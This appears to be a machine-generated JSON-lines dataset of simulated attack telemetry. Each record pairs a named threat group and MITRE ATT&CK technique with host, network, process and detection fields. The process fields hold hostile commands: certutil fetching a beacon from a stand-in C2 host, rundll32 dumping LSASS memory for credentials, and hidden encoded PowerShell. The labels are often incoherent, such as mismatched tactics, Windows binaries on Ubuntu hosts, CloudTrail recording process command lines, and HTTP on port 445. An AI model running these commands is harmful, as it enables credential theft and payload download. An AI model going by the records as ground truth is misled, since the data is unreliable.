{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Credential Access"],"technique_id":"T1570"},"event_id":"evt_mustangpanda_20260504T154237000Z_0015743","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.162.34.202","name":"EC2-INST-L49VA3BD8Z","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15743Mustang PandaT1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.191.212.125","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-04-08T11:01:16.000Z","user":{"name":"arn:aws:iam::jmre866x1za6","sid":"S-1-5-21-128074617-895699508-1290"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Privilege Escalation"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20250617T063548000Z_0015745","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.233.118.3","name":"WIN-FIN-SRV-C7QOFR7GT6","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15745Lapsus$T1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.154.148.202","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-08-25T09:30:26.000Z","user":{"name":"azuread\\katbr8lmid0u","sid":"S-1-5-21-381043954-648633044-7812"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Impact","Command and Control","Reconnaissance"],"technique_id":"T1071.001"},"event_id":"evt_mustangpanda_20250317T135614000Z_0015747","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.160.128.212","name":"DB-ORACLE-9WRVVOLIL1","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15747Mustang PandaT1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.175.165.143","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-03-30T11:45:42.000Z","user":{"name":"azuread\\bmzi2ln8g5ku","sid":"S-1-5-21-599085269-550711628-6324"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Lateral Movement","Reconnaissance","Command and Control"],"technique_id":"T1531"},"event_id":"evt_apt29_20260927T010648000Z_0015749","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.226.233.190","name":"APP-WEB-4OAXCGX7RH","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15749APT29T1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.65.233.109","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-04-15T21:39:31.000Z","user":{"name":"azuread\\8q7ie3x7uvv4","sid":"S-1-5-21-446426764-376920283-3679"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Command and Control"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20251113T155612000Z_0015751","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.3.242.130","name":"APP-WEB-4X3GFL82O8","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15751Mustang PandaT1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.141.74.151","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1720 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-02-24T23:41:13.000Z","user":{"name":"arn:aws:iam::bzimv7us9e2z","sid":"S-1-5-21-371073540-727698765-9880"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Credential Access"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20260815T002338000Z_0015753","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.51.42.169","name":"AZURE-VM-2FASK1R80O","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15753APT29T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.102.87.55","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-09-07T06:54:31.000Z","user":{"name":"azuread\\pjiqrxgquauw","sid":"S-1-5-21-441566415-181686661-8532"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Reconnaissance"],"technique_id":"T1003.001"},"event_id":"evt_fin7_20250212T032513000Z_0015755","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.107.90.8","name":"DB-ORACLE-5WRFHW2E09","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15755FIN7T1003.001"},"network":{"domain":"github.com","dst_ip":"1.167.59.91","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-02-26T20:58:16.000Z","user":{"name":"svc_v23pwudmm7dh","sid":"S-1-5-21-223498204-303996442-7506"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Execution","Exfiltration"],"technique_id":"T1531"},"event_id":"evt_unc4841_20260502T222120000Z_0015757","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.254.170.27","name":"EC2-INST-0J2587DWGA","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15757UNC4841T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.20.95.231","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 953 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-05-20T17:00:04.000Z","user":{"name":"svc_b60c3q7tcehd","sid":"S-1-5-21-760441192-102803341-3318"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Credential Access"],"technique_id":"T1566.001"},"event_id":"evt_unc4841_20251227T163219000Z_0015759","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.50.251.94","name":"IAM-ROLE-DZS0QAH09A","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15759UNC4841T1566.001"},"network":{"domain":"github.com","dst_ip":"1.120.30.2","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 787 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-12-14T18:32:22.000Z","user":{"name":"i-ozlawfhwyqut","sid":"S-1-5-21-282303033-360931420-2974"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Discovery","Execution"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20260116T042954000Z_0015761","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.230.53.237","name":"WIN-FIN-SRV-CFIE15MBM1","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15761UNC4841T1546.003"},"network":{"domain":"github.com","dst_ip":"1.148.50.126","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 737 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-06-24T17:13:28.000Z","user":{"name":"azuread\\ak66exde9jai","sid":"S-1-5-21-482913802-669494433-8871"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Persistence"],"technique_id":"T1071.001"},"event_id":"evt_lapsus_20260828T113622000Z_0015763","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.234.235.154","name":"IAM-ROLE-0QLSH9Z8YH","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15763Lapsus$T1071.001"},"network":{"domain":"github.com","dst_ip":"1.134.41.32","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-01-19T02:39:44.000Z","user":{"name":"svc_97bbfnr4czmh","sid":"S-1-5-21-695286620-365049206-5608"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Lateral Movement"],"technique_id":"T1531"},"event_id":"evt_mustangpanda_20260624T115831000Z_0015765","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.131.3.145","name":"AZURE-VM-4JG3K3XMWS","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15765Mustang PandaT1531"},"network":{"domain":"github.com","dst_ip":"1.168.240.22","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-04-06T01:54:14.000Z","user":{"name":"CORP\\zr0ki4a8vxgm","sid":"S-1-5-21-685874642-699333563-7398"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Discovery","Collection"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20260808T015157000Z_0015767","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.203.175.225","name":"AZURE-VM-L8N1RTQN3S","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15767FIN7T1021.006"},"network":{"domain":"github.com","dst_ip":"1.72.39.209","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-12-13T02:14:40.000Z","user":{"name":"svc_2qkjdgnz0lyh","sid":"S-1-5-21-953246101-932597775-5813"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Initial Access","Impact"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20250111T181320000Z_0015769","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.102.113.233","name":"APP-WEB-2WPJC81HQV","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15769APT41T1566.001"},"network":{"domain":"github.com","dst_ip":"1.73.221.62","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-01-25T00:43:44.000Z","user":{"name":"azuread\\7ivayzkceno2","sid":"S-1-5-21-162451886-851040352-1655"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Initial Access"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20250509T121058000Z_0015771","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.80.191.112","name":"EC2-INST-JJHV1F0SON","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15771Lapsus$T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.193.66.209","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-05-25T08:43:14.000Z","user":{"name":"i-s28xdkb19g4b","sid":"S-1-5-21-317206984-246088773-4960"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Execution"],"technique_id":"T1570"},"event_id":"evt_apt29_20260927T132221000Z_0015773","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.145.179.171","name":"AZURE-VM-2G5XLFXHUT","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15773APT29T1570"},"network":{"domain":"github.com","dst_ip":"1.45.164.3","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 693 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-04-25T08:25:16.000Z","user":{"name":"arn:aws:iam::08u6cq8kpm8g","sid":"S-1-5-21-668763850-858443527-8529"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Command and Control","Lateral Movement","Defense Evasion"],"technique_id":"T1021.006"},"event_id":"evt_apt41_20251020T221434000Z_0015775","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.224.135.202","name":"WIN-FIN-SRV-B9GN9VSCSV","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15775APT41T1021.006"},"network":{"domain":"github.com","dst_ip":"1.144.53.168","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2210 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-06-03T13:21:13.000Z","user":{"name":"i-8cs9rkodjk6x","sid":"S-1-5-21-433622345-672530306-2902"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Reconnaissance"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20250512T210524000Z_0015777","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.142.169.97","name":"IAM-ROLE-JTZ72H86DB","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15777APT29T1546.003"},"network":{"domain":"github.com","dst_ip":"1.22.210.151","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-01-29T20:08:16.000Z","user":{"name":"i-nsz0t4ly7ui3","sid":"S-1-5-21-629663963-904603399-8163"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Impact","Lateral Movement"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20250203T111234000Z_0015779","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.194.71.62","name":"AZURE-VM-WEDLDT8PBE","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15779APT41T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.91.219.177","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-10-25T04:35:34.000Z","user":{"name":"azuread\\o1319e6afpk5","sid":"S-1-5-21-698430406-354699886-2181"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Impact"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20251125T000659000Z_0015781","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.198.96.127","name":"AZURE-VM-WA2WNZ85ID","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15781APT41T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.178.107.241","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-05-25T22:24:20.000Z","user":{"name":"azuread\\sgavnyu5aqka","sid":"S-1-5-21-415426897-927079722-5302"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Credential Access","Privilege Escalation","Persistence"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20261020T025914000Z_0015783","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.217.251.250","name":"IAM-ROLE-IMZ7YNCWGC","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15783Mustang PandaT1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.136.193.72","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-05-21T08:32:11.000Z","user":{"name":"azuread\\bgq8qiwbfbr1","sid":"S-1-5-21-559059694-507628830-8566"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Reconnaissance"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20260719T015232000Z_0015785","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.178.199.106","name":"AZURE-VM-9OQIHMU0OV","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15785Mustang PandaT1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.123.65.75","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-04-26T14:12:53.000Z","user":{"name":"svc_e2n3anmv2ior","sid":"S-1-5-21-712143474-477388211-9754"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Command and Control"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20260308T060403000Z_0015787","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.65.236.29","name":"DB-ORACLE-4BATF0XPMC","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15787Mustang PandaT1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.135.50.163","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-12-26T07:52:31.000Z","user":{"name":"svc_50xmsad1qyv7","sid":"S-1-5-21-320738526-253725454-7050"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Command and Control","Impact"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20251113T035219000Z_0015789","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.139.30.246","name":"EC2-INST-O8DFA8LLR6","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15789APT29T1021.006"},"network":{"domain":"github.com","dst_ip":"1.142.166.73","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-01-23T01:02:11.000Z","user":{"name":"azuread\\l8eo8gagoo83","sid":"S-1-5-21-164316786-742620822-6455"}} |
